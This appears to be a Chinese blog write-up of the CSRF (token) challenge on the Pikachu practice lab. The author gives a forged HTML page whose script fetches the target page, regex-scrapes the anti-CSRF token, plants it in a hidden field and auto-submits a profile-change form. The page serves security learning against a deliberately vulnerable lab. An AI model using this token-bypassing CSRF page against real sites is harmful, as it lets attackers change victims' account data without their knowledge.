pikachu靶场之csrf(token)解题

已于 2023-04-12 15:29:23 修改
阅读量308 收藏 1
点赞数 3
文章标签: csrf 前端 安全 html javascript
于 2023-04-12 15:28:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z153300230/article/details/130107838
版权

刚接触安全的小白,最近在做pikachu的靶场,关于csrf(token)这个题目 网上找了好久没有找到答案,于是乎自己来做一做。

思路:

网站的token是每次通信后嵌入在页面中的,只要不刷新token一直有效。

伪造页面,在页面中植入攻击代码:

【1】先后台请求一次url,服务器会发送一个拥有新token的html

【2】解析html文本爬取token的值,并通过dom赋值给页面表单中的token标签

【3】后台发送攻击请求

伪造页面实现

<script>
  window.onload = function() {
    <!--ajax先请求一次-->
    const html = jQuery.get('http://pikachu.org/vul/csrf/csrftoken/token_get_edit.php');
    <!--获取到带有token的html文本,通过正则匹配到token-->
    const text = html.responseText;
    const takeToken = text.match(/\w{27}/gm)
    <!--使用dom修改表单里token的值-->
    document.getElementById("token").value = takeToken

    document.getElementById("postsubmit").click();
  }
</script>
</head>
<body>
  <form method="get" action="http://pikachu.org/vul/csrf/csrftoken/token_get_edit.php">
    <p class="per_sex">性别:<input type="text" name="sex" value="heihei"/></p>
    <p class="per_phone">手机:<input class="phonenum" type="text" name="phonenum" value="999999"/></p>
    <p class="per_add">住址:<input class="add" type="text" name="add" value="tiananmen"/></p>
    <p class="per_email">邮箱:<input class="email" type="text" name="email" value="qq@qq.com"/></p>
    <input id="token" type="hidden" name="token" value="123456789" />
    <input id="postsubmit" class="sub" type="submit" name="submit" value="submit"/>
  </form>
</body>
</html>

结果 

 

 修改成功!哈哈哈!

z153300230
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
docker部署前端项目(二)遇到的问题
weixin_45379180的博客
04-25 299
原因: 安装docker的时候使用的是 yum -y install docker 命令,这个命令安装的是老版本。报错四:conflicts with file from package docker-common。因为使用 sudo yum install docker (下载到的是旧版)missing signature key 缺少秘钥。yum remove docker 删除docker。1、docker版本号 只有1.13.1。解决:可能是docker 未启用。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 924
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
pikachu靶场通关之CSRF
qq_74825121的博客
01-20 959
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
Pikachu漏洞靶场系列之CSRF
weixin_45868644的博客
09-11 1379
文章目录概述CSRF攻击需要条件CSRF和XSS的区别检测是否存在CSRF漏洞一、CSRF(get)二、CSRF(post)CSRFtoken)防护措施 概述 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了、所以CSRF攻击也被称为“one click”攻击。 CSRF攻击需要条件 1、目标网站没有对修改个人信息修改的请
pikachu靶场CSRFTOKEN绕过
黄乔国PHP
03-08 1571
Pikachu靶场中的CSRF漏洞环节里面有一关CSRF TOKEN,这个关卡和其余关卡稍微有点不一样,因为表单里面存在一个刷新就会变化的token,那么这个token是否能绕过呢?接下来我们来仔细分析分析。
PikachuCSRF
weixin_48621644的博客
10-17 1746
小羊学安全 任重而道远~
Pikachu-----CSRF(跨站请求伪造)
m0_65712192的博客
12-19 1256
Pikachu-----CSRF(跨站请求伪造)
pikachu靶场-CSRF(跨站请求伪造)
qq_44655084的博客
12-30 979
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu靶场--CSRF--get/post/token【3.1】~【3.3】
lmei1228的博客
06-08 214
当然,如果小黑事先在xxx网的首页如果发现了一个XSS漏洞,则小黑可能会这样做: 欺骗小白访问埋伏了XSS脚本(盗取cookie的脚本)的页面,小白中招,小黑拿到小白的cookie,然后小黑顺利登录到小白的后台,小黑自己修改小白的相关信息。---所以跟上面比一下,就可以看出CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。所以小黑想要修改大白的信息,他需要拥有:1,登录权限 2,修改个人信息的请求。
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场环境
02-12
pikachu靶场环境
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 953
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
前端】数组的常用处理函数
lcukyNwa的博客
04-22 418
item------->每个元素值 (必)index----->索引(可选)arr-------- >当前数组(可选)推荐vscode的一款插件来写以下的demo,该插件可以直接在js文件中显示结果,搜 Quokka.js用这个插件去新建一个js文件,直接就运行在node上了forEach不会返回一个新的数组,里面改值会影响原数组,其他方法不影响原数组map可以返回新数组 用于映射,如每个元素都加倍或执行其他转换操作every返回一布尔值,需数组中全部满足。
C++ WebServer的细节理解
我的博客
04-22 602
在非阻塞模式下,如果 I/O 操作不能立即完成(例如,因为没有数据可读 或 写缓冲区满),系统不会让调用进程阻塞等待,而是立即返回一个错误(通常为 EAGAIN 或 EWOULDBLOCK)。先查询文件描述符 fd 当前的标志,然后将 O_NONBLOCK 标志加入其中,并通过 F_SETFL 来更新文件描述符,最终实现将该文件描述符切换为非阻塞模式。这意味着,如果没有待处理的连接请求(即没有客户端尝试连接到服务器),accept() 会一直阻塞,直到有新的连接请求到达或发生其他特定条件(如超时)为止。
SpringBoot项目打包分离高阶操作
最新发布
Record Little
04-23 627
虽然传输jar包 比较大,但是安全性、稳定性比较高,不需要关注pom.xml 添加了新的依赖、更新了版本号等等影响版本功能的操作。关注maven的特性, profiles即可满足, 根据不同的activation 状态,激活不同的build操作。每次修改一小部分代码或仅仅更新某个依赖jar包时,都需要重新进行整个项目的构建、打包、上传和部署。但是当你的项目趋于稳定,只有业务上的逻辑变更时,如果使用分离版本,可以加快迭代、更新的速度。弊端: 需要配置IDE命令,修改依赖时需要同时修改2处。
Vue-router的动态路由:获取传递的值
woliuhuaqiangla的博客
04-22 392
Vue.js是一款流行的JavaScript框架,用于构建单页面应用程序。它提供了许多有用的功能,其中之一是Vue-router,它允许您轻松地管理应用程序的路由。Vue-router支持动态路由,这意味着您可以在路由中使用变量,并在组件中访问它们。本文将介绍如何定义Vue-router的动态路由,以及如何获取传递的值。动态路由的优缺点动态路由是指根据特定的参数来动态地生成路由,这在使用Vue-router时是非常常见的。
pikachu靶场CSRF
10-03
pikachu靶场中的CSRF(Cross-Site Request Forgery)是一种常见的Web安全漏洞,它允许攻击者利用受信任用户的身份执行未经...为了防止CSRF攻击,pikachu靶场采取了一些防护措施,如使用CSRF Token来验证请求的合法性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值